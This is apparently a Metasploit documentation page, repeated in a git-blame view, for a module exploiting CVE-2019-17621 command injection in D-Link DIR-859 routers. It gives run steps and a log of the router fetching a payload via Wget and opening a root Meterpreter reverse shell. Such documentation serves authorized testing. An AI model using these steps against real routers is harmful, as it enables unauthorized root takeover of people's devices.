documentation/modules/exploit/linux/upnp/dlink_dir859_subscribe_exec.md

## Introduction

This module exploits CVE.2019-17621, a remote unauthenticated OS command injection in the UPnP API of the DIR-859 and other D-link SOHO routers via the `service` argument to the `gena.cgi` URL.

## Vulnerable Application

Get a D-Link DIR-859 router (or [any of the devices/firmware versions mentioned here](https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10147)), or download firmware versions 1.06 or 1.05 and run them on firmadyne or similar emulation frameworks.

## Verification Steps

1. Set up router/emulated device
2. Start `msfconsole`
3. Do: `use exploit/linux/upnp/dlink_dir859_subscribe_exec`
4. Do: `set RHOSTS <router_ip>`
5. Do: `set LHOST <local_ip>`
6. Do: `run`
7. You should get a session as `root`.

## Scenarios

### D-link DIR-859 Firmware 1.05
```
msf5 exploit(linux/http/dlink_dir859_exec_telnet) > run 

[*] Started reverse TCP handler on 192.168.0.2:4444 
[*] Using URL: http://192.168.0.2:8080/r2hOQycyVvN2BP
[*] Client 192.168.0.1 (Wget) requested /r2hOQycyVvN2BP
[*] Sending payload to 192.168.0.1 (Wget)
[*] Command Stager progress - 100.00% done (118/118 bytes)
[*] Meterpreter session 7 opened (192.168.0.2:4444 -> 192.168.0.1:54599) at 2020-01-10 11:36:52 -0300
[*] Server stopped.

meterpreter > getuid 
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo 
Computer     : 192.168.0.1
OS           :  (Linux 2.6.32.70)
Architecture : mips
BuildTuple   : mips-linux-muslsf
Meterpreter  : mipsbe/linux
meterpreter >
```
Documentation for dlink_dir859_subscribe_exec 2020-01-13 13:27:42 -03:00			`## Introduction`

			This module exploits CVE.2019-17621, a remote unauthenticated OS command injection in the UPnP API of the DIR-859 and other D-link SOHO routers via the `service` argument to the `gena.cgi` URL.

documentation: s/Setup/Vulnerable Application/ 2020-01-17 20:35:27 -03:00			`## Vulnerable Application`
Documentation for dlink_dir859_subscribe_exec 2020-01-13 13:27:42 -03:00
Fix typo in documentation 2020-01-17 20:31:47 -03:00			`Get a D-Link DIR-859 router (or [any of the devices/firmware versions mentioned here](https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10147)), or download firmware versions 1.06 or 1.05 and run them on firmadyne or similar emulation frameworks.`
Documentation for dlink_dir859_subscribe_exec 2020-01-13 13:27:42 -03:00
Add "Verification Steps" 2020-01-17 20:48:37 -03:00			`## Verification Steps`

			`1. Set up router/emulated device`
			2. Start `msfconsole`
			3. Do: `use exploit/linux/upnp/dlink_dir859_subscribe_exec`
			4. Do: `set RHOSTS <router_ip>`
			5. Do: `set LHOST <local_ip>`
			6. Do: `run`
			7. You should get a session as `root`.

documentation: s/Usage/Scenarios/ 2020-01-17 20:32:27 -03:00			`## Scenarios`
Documentation for dlink_dir859_subscribe_exec 2020-01-13 13:27:42 -03:00
Add router module/firmware version tested 2020-01-17 20:57:44 -03:00			`### D-link DIR-859 Firmware 1.05`
Documentation for dlink_dir859_subscribe_exec 2020-01-13 13:27:42 -03:00			```
			`msf5 exploit(linux/http/dlink_dir859_exec_telnet) > run`

			`[*] Started reverse TCP handler on 192.168.0.2:4444`
			`[*] Using URL: http://192.168.0.2:8080/r2hOQycyVvN2BP`
			`[*] Client 192.168.0.1 (Wget) requested /r2hOQycyVvN2BP`
			`[*] Sending payload to 192.168.0.1 (Wget)`
			`[*] Command Stager progress - 100.00% done (118/118 bytes)`
			`[*] Meterpreter session 7 opened (192.168.0.2:4444 -> 192.168.0.1:54599) at 2020-01-10 11:36:52 -0300`
			`[*] Server stopped.`

			`meterpreter > getuid`
			`Server username: uid=0, gid=0, euid=0, egid=0`
			`meterpreter > sysinfo`
			`Computer : 192.168.0.1`
			`OS : (Linux 2.6.32.70)`
			`Architecture : mips`
			`BuildTuple : mips-linux-muslsf`
			`Meterpreter : mipsbe/linux`
			`meterpreter >`
			```